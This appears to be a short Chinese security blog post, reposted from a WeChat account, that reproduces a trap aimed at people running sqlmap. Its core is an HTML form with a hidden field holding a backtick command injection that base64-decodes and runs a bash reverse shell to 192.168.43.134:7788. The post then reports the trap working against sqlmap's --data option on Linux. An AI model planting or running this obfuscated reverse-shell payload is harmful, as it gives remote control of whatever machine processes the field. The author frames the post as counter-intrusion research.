sqlamp反制复现

admin 2023年11月29日20:04:50评论34 views字数 513阅读1分42秒阅读模式

反引号:在linux中,反引号中的内容一般是一行或多行命令,当这些命令被反引号引的时候,命令执行结果就会以字符串的形式被保留下来。

sqlamp反制复现

搭建搭建个简易请求:

<html><head><meta charset="utf-8"><title> test demo</title></head><body><input>search the user</input> <form action="test.html" method="post" enctype="text/plain"><input type='hidden' name='name' value="`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjEzNC83Nzg4IDA+JjE=| base64 -d|bash -i`"/><input type="submit" value='提交'></form></body></html>


sqlamp反制复现

请求包:

sqlamp反制复现


sqlamp反制复现

测试了sqlmap --data可以执行命令,但是-a一把梭没有执行,不知道为啥;而且这个好像暂时只能反制linux攻击机,反制代码太明显 有些鸡肋

原文始发于微信公众号(fly的渗透学习笔记):sqlamp反制复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月29日20:04:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sqlamp反制复现http://cn-sec.com/archives/2252896.html

发表评论

匿名网友 填写信息